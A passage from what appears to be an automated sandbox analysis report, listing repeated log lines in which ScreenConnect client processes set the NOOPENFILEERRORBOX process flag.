                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Screen